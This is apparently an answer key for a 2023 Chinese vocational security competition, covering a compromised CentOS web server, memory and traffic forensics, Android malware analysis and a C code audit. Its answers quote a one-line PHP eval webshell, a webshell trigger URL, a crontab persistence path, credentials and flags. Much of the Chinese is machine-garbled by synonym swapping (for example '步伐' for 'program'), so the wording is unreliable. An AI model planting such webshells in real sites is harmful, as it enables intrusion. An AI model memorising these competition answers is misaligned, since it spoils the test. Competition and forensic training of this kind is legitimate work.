2023年全国职业院校技能大赛信息安全管理与评估—网络安全事件响应、数字取 ...

网络安全事件响应、数字取证调查、应用步伐安全 ** 参考答案**

第一部分 ****网络安全事件响应

任务1： ** CentOS** ** 服务器应急响应（70分）**

A集团的应用服务器被黑客入侵，该服务器的Web应用体系被上传恶意软件，体系文件被恶意软件破坏，您的团队需要资助该公司追踪此网络攻击的泉源，在服务器上进行全面的查抄，包括日记信息、进程信息、体系文件、恶意文件等，从而分析黑客的攻击举动，发现体系中的漏洞，并对发现的漏洞进行修复。
本任务 ** 素材** ** 清单** ** ：** ** CentOS服** **

务** ** 器虚** ** 拟** ** 机** ** 。**
受攻击的Server服务器已整体打包成虚拟机文件保存，请选手自行导入分析。用户名：root，暗码：nanyidian…
留意：Server服务器的基本配置拜见附录，若题目中未明白规定，请利用默认配置。
请按要求完成该部分的工作任务。
任务1： CentOS 服务器应急响应

---

序号
|
任务内容
|
答案
1
|
请提交网站管理员的用户名和暗码
|
manager1/863211
2
|
攻击者通过应用后台修改了某文件获取了服务器权限，请提交该文件的文件名
|
footer.php
3
|
攻击者通过篡改文件后，可通过该网站官网进行任意未授权命令执行，请提交利用该木马执行phpinfo的payload,例如:/shell.php?cmd=phpinfo();
|
/?pass=phpinfo();
4
|
攻击者进一步留下的免杀的webshell在网站中，请提交该shell的原文最简式，例如： <?php ...?>
|
<?php eval($_POST['loveU']);?> 5
|
攻击者修改了某文件，导致webshell删除后会主动生成，请提交该文件的绝对路径
|
/etc/crontab
6
|
请提交网站服务连接数据库利用的数据库账号和暗码
|
wordpress/wordpress-pass
7
|
请提交攻击者在数据库中留下的信息，格式为：flag{…}
|
flag{th1s_ls_fl44444g1}
第二部分 数字取证调查

任务 ** 2** ** ：基于Windows的内存取证（40分）**

A集团某服务器体系感染恶意步伐，导致体系关键文件被破坏，请分析A集团提供的体系镜像和内存镜像，找到体系镜像中的恶意软件，分析恶意软件举动。
本任务 ** 素材** ** 清单** ** ：内存镜像（.raw）。*

请按要求完成该部分的工作任务。
任务 2 ：基于Windows的内存取证

---

序号
|
任务内容
|
答案
1
|
请指出内存中疑似恶意进程
|
.hack.ex
2
|
请指出该员工利用的公司OA平台的暗码
|
liuling7541
3
|
黑客传入一个木马文件并做了权限维持，请问木马文件名是什么
|
h4ck3d!
4
|
请提交该盘算机中记载的重要接洽人的家庭住址
|
秋水省雁荡市碧波区千屿山庄1号
任务 ** 3** ** ：通信数据分析取证（50分）**

A集团的网络安全监控体系发现恶意份子正在实行高级可一连攻击（APT），并抓取了部分可疑流量包。请您根据捕捉到的流量包，征采出网络攻击线索，分解出潜伏的恶意步伐，并分析恶意步伐的举动。
本任务 ** 素材** ** 清单** ** ：捕获的通信数据文件。**

请按要求完成该部分的工作任务。
任务 3 ：通信数据分析取证

---

序号
|
任务内容
|
答案
1
|
请提交网络数据包中传输的可执行的恶意步伐文件名
|
happy.docx
2
|
请提交该恶意步伐下载载荷的ip和端口
|
10.78.128.154:9090
3
|
请提交恶意步伐载荷读取的本地文件名（含路径）
|
c:\tmp\secret.txt
4
|
请提交恶意步伐读取的本地文件的内容
|
f6dff95c2ec911ebbede0cdd24f6bd6d
任务 ** 4** ** ：基于Linux盘算机单机取证（60分）**

对给定取证镜像文件进行分析，征采证据关键字（线索关键字为“evidence 1”、“evidence 2”、……、“evidence
10”，有文本形式也有图片形式，不区分大小写），请提取和固定比赛要求的标的证据文件，并按样例的格式要求填写相关信息，证据文件在总文件数中所占比例不低于15%。取证的信息大概潜伏在正常的、已删除的或受损的文件中，您大概需要运用编码转换技术、加解密技术、隐写技术、数据规复技术，还需要熟悉常用的文件格式（如办公文档、压缩文档、图片等）。
本任务 ** 素材** ** 清单** ** ：取证镜像文件。**

请按要求完成该部分的工作任务。
任务 4 ：基于Linux盘算机单机取证

---

证据编号
|
在取证镜像中的文件名
|
镜像中原文件Hash码（MD5，不区分大小写）
evidence 1
|
lili.gif
|
900EA4D6698613298AEDE3DF36BA92B8
evidence 2
|
qwe.dll
|
FB99F9C2C207281E0CD7A29E976F1CDD
evidence 3
|
dudu.xlsx
|
2437FD58491FBCA528B49B4AC7089425
evidence 4
|
vbdg.docx
|
6B8DFFA9586C6D99B559C79A2105D855
evidence 5
|
four_Digit.jpg
|
509998568BEAFA5D6C950493220F783D
evidence 6
|
jiko.py
|
68BB1999633DBB422C164AA4F664897B
evidence 7
|
INbud.bmp
|
9CEADE34EB17E135E24CB7937A600ADC
evidence 8
|
0N0n.jpg
|
45EB5309A774F1DB0B3B996584EB4326
evidence 9
|
buhu
|
900AA268F3BF119233CB2F05D5B8FAFD
evidence 10
|
yiji.doc
|
F70BBEC2D9AC8A4658D262D2695824EA
第三部分 应用步伐安全

任务 ** 5** ** ：Android恶意步伐分析（50分）**

A集团发现其发布的Android移动应用步伐文件遭到非法篡改，您的团队需要协助A集团对该恶意步伐样本进行逆向分析、对其攻击/破坏的举动进行调查取证。
本任务 ** 素材** ** 清单** ** ：Android移动应用步伐文件。**

请按要求完成该部分的工作任务。
任务 5 ：Android恶意步伐分析

---

序号
|
任务内容
|
答案
1
|
提交素材中的恶意应用回传数据的url地址
|
http://wwww.somethingOrNothing.com/r/r/r/r
2
|
提交素材中的恶意代码保存数据文件名称（含路径）
|
/storage/emulated/0/Android/data/com.example.myapplication/files/.a/.a
3
|
提交素材中的恶意举动发起的dex的SHA1签名值
|
bb5adc13d8cedb7b34187d8293a92a5ee02996b0
4
|
描述素材中恶意代码的举动
|
读取并删除通讯录接洽人数据，加密后写入本地文件，并上传到指定网址。
任务 ** 6** ** ：** ** C** ** 代码审计（30分）**

代码审计是指对源代码进行查抄，探求代码存在的脆弱性，这是一项需要多方面技能的技术。作为一项软件安全查抄工作，代码安全检察好坏常重要的一部分，由于大部分代码从语法和语义上来说是正确的，但存在着大概被利用的安全漏洞，你必须依赖你的知识和履历来完成这项工作。
本任务 ** 素材** ** 清单** ** ：C源代码文件。**

请按要求完成该部分的工作任务。
任务 6 ：C代码审计

---

序号
|
任务内容
|
答案
1
|
请指出本段代码存在什么漏洞
|
缓冲区溢出
2
|
请指出存在漏洞的函数名称，例如：scanf
|
fgets
学习网络安全技术的方法无非三种:
第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:步伐设计、盘算机组成原理原理、数据结构、操作体系原理、数据库体系、 盘算机网络、人工智能、自然语言处置惩罚、社会盘算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。
第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，大概很长一段时间感觉自己没有进步，容易劝退。
如果你对网络安全入门感兴趣，那么你需要的话可以点击这里